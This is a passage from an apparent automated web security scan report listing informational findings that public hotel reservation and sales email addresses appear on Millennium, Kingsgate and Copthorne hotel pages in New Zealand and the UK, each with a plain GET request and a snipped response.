<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.queenstown@millenniumhotels.co.nz" target="_self"
title="kingsgate.queenstown@millenniumhotels.co.nz">
...[SNIP]...

21.301. http://www.millenniumhotels.co.nz/kingsgaterotorua/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgaterotorua/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.rotorua@millenniumhotels.co.nz

Request

GET /kingsgaterotorua/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:03:43 GMT
ETag: "265d4-cb1c-70c2a375"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:58:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.rotorua@millenniumhotels.co.nz" target="_self"
title="kingsgate.rotorua@millenniumhotels.co.nz">
...[SNIP]...

21.302. http://www.millenniumhotels.co.nz/kingsgateteanau/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgateteanau/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.teanau@millenniumhotels.co.nz

Request

GET /kingsgateteanau/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:03:33 GMT
ETag: "2927b-c9f7-999e0a15"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.teanau@millenniumhotels.co.nz" target="_self"
title="kingsgate.teanau@millenniumhotels.co.nz">
...[SNIP]...

21.303. http://www.millenniumhotels.co.nz/kingsgatewanganui/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatewanganui/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.wanganui@millenniumhotels.co.nz

Request

GET /kingsgatewanganui/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:38 GMT
ETag: "373c8-c968-1da3d31f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.wanganui@millenniumhotels.co.nz" target="_self"
title="kingsgate.wanganui@millenniumhotels.co.nz">
...[SNIP]...

21.304. http://www.millenniumhotels.co.nz/kingsgatewellington/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatewellington/index.html

Issue detail

The following email address was disclosed in the response:

reservations@kingsgatewellington.co.nz

Request

GET /kingsgatewellington/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:36 GMT
ETag: "279ba-cacf-1d7b882e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:reservations@kingsgatewellington.co.nz" target="_self"
title="reservations@kingsgatewellington.co.nz">
...[SNIP]...

21.305. http://www.millenniumhotels.co.nz/kingsgatewhangarei/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/kingsgatewhangarei/index.html

Issue detail

The following email address was disclosed in the response:

kingsgate.whangarei@millenniumhotels.co.nz

Request

GET /kingsgatewhangarei/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:03:35 GMT
ETag: "277aa-cabc-46d827dc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:kingsgate.whangarei@millenniumhotels.co.nz" target="_self"
title="kingsgate.whangarei@millenniumhotels.co.nz">
...[SNIP]...

21.306. http://www.millenniumhotels.co.nz/millenniumchristchurch/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/millenniumchristchurch/index.html

Issue detail

The following email address was disclosed in the response:

millennium.christchurch@millenniumhotels.co.nz

Request

GET /millenniumchristchurch/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:29 GMT
ETag: "27971-cd71-1d19c7c4"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:millennium.christchurch@millenniumhotels.co.nz" target="_self"
title="millennium.christchurch@millenniumhotels.co.nz">
...[SNIP]...

21.307. http://www.millenniumhotels.co.nz/millenniumqueenstown/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/millenniumqueenstown/index.html

Issue detail

The following email address was disclosed in the response:

millennium.queenstown@millenniumhotels.co.nz

Request

GET /millenniumqueenstown/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 14:03:26 GMT
ETag: "27bd9-cd2a-1ce516ff"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="millennium.queenstown@millenniumhotels.co.nz" target="_self"
href="mailto:millennium.queenstown@millenniumhotels.co.nz">
...[SNIP]...

21.308. http://www.millenniumhotels.co.nz/millenniumrotorua/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/millenniumrotorua/index.html

Issue detail

The following email address was disclosed in the response:

millennium.rotorua@millenniumhotels.co.nz

Request

GET /millenniumrotorua/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:03:21 GMT
ETag: "27d11-cc0a-6f71c0c8"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:millennium.rotorua@millenniumhotels.co.nz" target="_self"
title="millennium.rotorua@millenniumhotels.co.nz">
...[SNIP]...

21.309. http://www.millenniumhotels.co.nz/millenniumtaupo/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.nz
Path:	/millenniumtaupo/index.html

Issue detail

The following email address was disclosed in the response:

millennium.taupo@millenniumhotels.co.nz

Request

GET /millenniumtaupo/index.html HTTP/1.1
Host: www.millenniumhotels.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:03:21 GMT
ETag: "29289-cace-4606d2fe"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:millennium.taupo@millenniumhotels.co.nz" target="_self"
title="millennium.taupo@millenniumhotels.co.nz">
...[SNIP]...

21.310. http://www.millenniumhotels.co.uk/copthorneaberdeen/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthorneaberdeen/index.html

Issue detail

The following email address was disclosed in the response:

reservations.aberdeen@millenniumhotels.co.uk

Request

GET /copthorneaberdeen/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:11:27 GMT
ETag: "2257f-cdc3-b5daaecc"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="reservations.aberdeen@millenniumhotels.co.uk" target="_self"
href="mailto:reservations.aberdeen@millenniumhotels.co.uk">
...[SNIP]...

21.311. http://www.millenniumhotels.co.uk/copthornebirmingham/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornebirmingham/index.html

Issue detail

The following email address was disclosed in the response:

reservations.birmingham@millenniumhotels.co.uk

Request

GET /copthornebirmingham/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:02:25 GMT
ETag: "1fb35-cd2c-42b55e8b"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:reservations.birmingham@millenniumhotels.co.uk" target="_self"
title="reservations.birmingham@millenniumhotels.co.uk">
...[SNIP]...

21.312. http://www.millenniumhotels.co.uk/copthornecardiff/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornecardiff/index.html

Issue detail

The following email address was disclosed in the response:

sales.cardiff@millenniumhotels.co.uk

Request

GET /copthornecardiff/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:10:41 GMT
ETag: "138a7-cde2-b31970ce"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="sales.cardiff@millenniumhotels.co.uk" target="_self"
href="mailto:sales.cardiff@millenniumhotels.co.uk">
...[SNIP]...

21.313. http://www.millenniumhotels.co.uk/copthornedudley/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornedudley/index.html

Issue detail

The following email address was disclosed in the response:

reservations.merryhill@millenniumhotels.co.uk

Request

GET /copthornedudley/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:01:28 GMT
ETag: "220c6-cc5e-3f505566"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="reservations.merryhill@millenniumhotels.co.uk" target="_self"
href="mailto:reservations.merryhill@millenniumhotels.co.uk">
...[SNIP]...

21.314. http://www.millenniumhotels.co.uk/copthorneeffinghamgatwick/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthorneeffinghamgatwick/index.html

Issue detail

The following email address was disclosed in the response:

sales.effingham@millenniumhotels.co.uk

Request

GET /copthorneeffinghamgatwick/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:01:03 GMT
ETag: "1256a-ce83-3dd2260b"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="sales.effingham@millenniumhotels.co.uk" target="_self"
href="mailto:sales.effingham@millenniumhotels.co.uk">
...[SNIP]...

21.315. http://www.millenniumhotels.co.uk/copthornegatwick/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornegatwick/index.html

Issue detail

The following email addresses were disclosed in the response:

sales.gatwick@mill-cop.com
sales.gatwick@millenniumhotels.co.uk

Request

GET /copthornegatwick/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 13:00:43 GMT
ETag: "1bfd3-cf9c-3c9a4c0f"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:sales.gatwick@millenniumhotels.co.uk" target="_self"
title="sales.gatwick@mill-cop.com">
...[SNIP]...

21.316. http://www.millenniumhotels.co.uk/copthornemanchester/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornemanchester/index.html

Issue detail

The following email address was disclosed in the response:

reservations.manchester@millenniumhotels.co.uk

Request

GET /copthornemanchester/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:09:12 GMT
ETag: "1337d-ce10-adcefc15"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:reservations.manchester@millenniumhotels.co.uk" target="_self"
title="reservations.manchester@millenniumhotels.co.uk">
...[SNIP]...

21.317. http://www.millenniumhotels.co.uk/copthornenewcastle/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornenewcastle/index.html

Issue detail

The following email address was disclosed in the response:

sales.newcastle@millenniumhotels.co.uk

Request

GET /copthornenewcastle/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:08:49 GMT
ETag: "1fb0c-cd95-ac70455e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="sales.newcastle@millenniumhotels.co.uk" target="_self"
href="mailto:sales.newcastle@millenniumhotels.co.uk">
...[SNIP]...

21.318. http://www.millenniumhotels.co.uk/copthorneplymouth/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthorneplymouth/index.html

Issue detail

The following email address was disclosed in the response:

sales.plymouth@millenniumhotels.co.uk

Request

GET /copthorneplymouth/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:59:20 GMT
ETag: "27eec-ce43-37aebb54"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="sales.plymouth@millenniumhotels.co.uk" target="_self"
href="mailto:sales.plymouth@millenniumhotels.co.uk">
...[SNIP]...

21.319. http://www.millenniumhotels.co.uk/copthornereading/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornereading/index.html

Issue detail

The following email address was disclosed in the response:

copthorne.reading@millenniumhotels.co.uk

Request

GET /copthornereading/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:08:00 GMT
ETag: "13c71-caab-a97d3307"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="copthorne.reading@millenniumhotels.co.uk" target="_blank"
href="mailto:copthorne.reading@millenniumhotels.co.uk">
...[SNIP]...

21.320. http://www.millenniumhotels.co.uk/copthornesheffield/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornesheffield/index.html

Issue detail

The following email address was disclosed in the response:

reservations.sheffield@millenniumhotels.co.uk

Request

GET /copthornesheffield/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:07:42 GMT
ETag: "15055-cc8e-a8713783"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:reservations.sheffield@millenniumhotels.co.uk" target="_self"
title="reservations.sheffield@millenniumhotels.co.uk">
...[SNIP]...

21.321. http://www.millenniumhotels.co.uk/copthornesloughwindsor/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornesloughwindsor/index.html

Issue detail

The following email address was disclosed in the response:

sales.slough@millenniumhotels.co.uk

Request

GET /copthornesloughwindsor/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:07:26 GMT
ETag: "280f4-cf26-a775af6c"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="sales.slough@millenniumhotels.co.uk" target="_self"
href="mailto:sales.slough@millenniumhotels.co.uk">
...[SNIP]...

21.322. http://www.millenniumhotels.co.uk/copthornetarakensington/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/copthornetarakensington/index.html

Issue detail

The following email address was disclosed in the response:

reservations.tara@millenniumhotels.co.uk

Request

GET /copthornetarakensington/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:57:52 GMT
ETag: "13d58-f912-326483a4"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a title="reservations.tara@millenniumhotels.co.uk" target="_self"
href="mailto:reservations.tara@millenniumhotels.co.uk">
...[SNIP]...

21.323. http://www.millenniumhotels.co.uk/millenniumcopthornechelseafc/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumcopthornechelseafc/index.html

Issue detail

The following email address was disclosed in the response:

reservations.chelsea@millenniumhotels.co.uk

Request

GET /millenniumcopthornechelseafc/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 11:00:53 GMT
ETag: "12288-d17d-9009753e"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:reservations.chelsea@millenniumhotels.co.uk" target="_self"
title="reservations.chelsea@millenniumhotels.co.uk">
...[SNIP]...

21.324. http://www.millenniumhotels.co.uk/millenniumglasgow/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumglasgow/index.html

Issue detail

The following email address was disclosed in the response:

20glasgow.reservations@millenniumhotels.co.uk

Request

GET /millenniumglasgow/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 02 Feb 2011 12:52:04 GMT
ETag: "12ae9-ce65-1db0f230"
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:59:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="mailto:%20glasgow.reservations@millenniumhotels.co.uk" target="_self"
title="Email Us ">
...[SNIP]...

21.325. http://www.millenniumhotels.co.uk/millenniumgloucester/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumgloucester/index.html

Issue detail

The following email address was disclosed in the response:

reservations.gloucester@millenniumhotels.co.uk

Request

GET /millenniumgloucester/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.326. http://www.millenniumhotels.co.uk/millenniumkensington/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumkensington/index.html

Issue detail

The following email address was disclosed in the response:

reservations.baileys@millenniumhotels.co.uk

Request

GET /millenniumkensington/index.html HTTP/1.1
Host: www.millenniumhotels.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.327. http://www.millenniumhotels.co.uk/millenniumknightsbridge/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.millenniumhotels.co.uk
Path:	/millenniumknightsbridge/index.html

Issue detail

